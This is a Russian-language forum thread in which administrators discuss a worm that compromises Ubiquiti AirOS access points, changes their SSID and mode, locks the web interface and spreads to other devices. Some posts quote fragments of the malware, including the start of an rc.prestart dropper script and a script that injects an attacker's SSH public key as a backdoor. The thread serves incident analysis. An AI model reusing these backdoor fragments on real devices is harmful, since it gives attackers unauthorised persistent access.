steelrat

А управление закрыто?

Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться. На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса...

Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh.

ubnt@xxx.xxx.xxx.xxx's password: BusyBox v1.11.2 (2013-05-28 17:52:06 EEST) built-in shell (ash) Enter 'help' for a list of built-in commands. XM.v5.5.6# ls -lA -rw------- 1 ubnt admin 459 Apr 6 2012 dropbear_dss_host_key -rw------- 1 ubnt admin 427 Apr 6 2012 dropbear_rsa_host_key -rw------- 1 ubnt admin 20055 Dec 14 03:02 mf.tar -rwxr-xr-x 1 ubnt admin 1857 Dec 13 00:59 rc.prestart XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# cat rc.prestart #!/bin/sh mkdir -p /var/bin cat << EOFEOFEOF | uude

Порт от игровых серваков... :-)

Взлом точек продолжается... новая ресия вирусни --------------- #!/bin/sh if [ "$HTTP_HOST" = "localhost.localnet" ]; then PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETu GB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9I HM9q2+ecVYIF" 2>/dev/null >>

Administrator и пароль какой-то...